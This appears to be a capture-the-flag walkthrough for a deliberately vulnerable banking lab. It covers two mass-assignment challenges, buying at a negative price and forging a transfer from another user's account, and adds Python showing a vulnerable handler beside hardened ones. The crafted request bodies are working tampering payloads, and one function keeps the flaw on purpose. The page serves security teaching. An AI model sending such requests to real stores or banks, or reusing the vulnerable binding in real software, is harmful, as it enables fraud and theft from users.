
Invalid Model

Challenge

#1: Buy product for another price

Buy a product from the store for a price other than the one that is listed.

Solution

Send a custom POST request to /api/Store/BuyProduct with the following body.

{
	"id": 1,
	"quantity": 1,
	"price": -10
}

You will find the flag in the response header.

#2: Create a transaction for another user

Create a transaction for another user.

Solution

Send a POST request to Transaction/Create with the following body. Don't forget to include the RequestVerification token and cookie in your request.

SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:

You can find the flag in the response cookie.
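
Both challenges work because the server binds fields the client should never control (price and SenderId). The following is an added example, not SecureBank's own code: a framework-neutral Python sketch of the vulnerable binding beside a hardened form. CATALOGUE, the function names and session_user are assumptions made for illustration.

```python
from dataclasses import dataclass
from decimal import Decimal

# Constructed sample data: the server-side price list (hypothetical).
CATALOGUE = {1: Decimal("25.00")}

class ValidationError(Exception):
    """Raised when a request body fails server-side validation."""

@dataclass(frozen=True)
class Purchase:
    product_id: int
    quantity: int
    unit_price: Decimal

@dataclass(frozen=True)
class Transaction:
    sender_id: str
    receiver_id: str
    amount: Decimal

def buy_product_vulnerable(body: dict) -> Purchase:
    # Over-posting: every client field, including price, is bound as-is.
    return Purchase(body["id"], body["quantity"], Decimal(str(body["price"])))

def buy_product_hardened(body: dict) -> Purchase:
    # Bind only id and quantity; the price always comes from the catalogue.
    product_id, quantity = body.get("id"), body.get("quantity")
    if type(product_id) is not int or product_id not in CATALOGUE:
        raise ValidationError("unknown product")
    if type(quantity) is not int or quantity < 1:
        raise ValidationError("quantity must be a positive integer")
    return Purchase(product_id, quantity, CATALOGUE[product_id])

def create_transaction_hardened(form: dict, session_user: str) -> Transaction:
    # SenderId from the form is ignored; the sender is the authenticated user.
    try:
        amount = Decimal(str(form.get("Amount")))
    except ArithmeticError:
        raise ValidationError("amount must be a number")
    receiver = form.get("ReceiverId")
    if not receiver or receiver == session_user:
        raise ValidationError("invalid receiver")
    if not amount.is_finite() or amount <= 0:
        raise ValidationError("amount must be positive")
    return Transaction(session_user, receiver, amount)
```

With the hardened handlers, the body from challenge #1 is charged at the catalogue price, and the form from challenge #2 can only ever debit the account of the logged-in user.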


Last updated 5 years ago
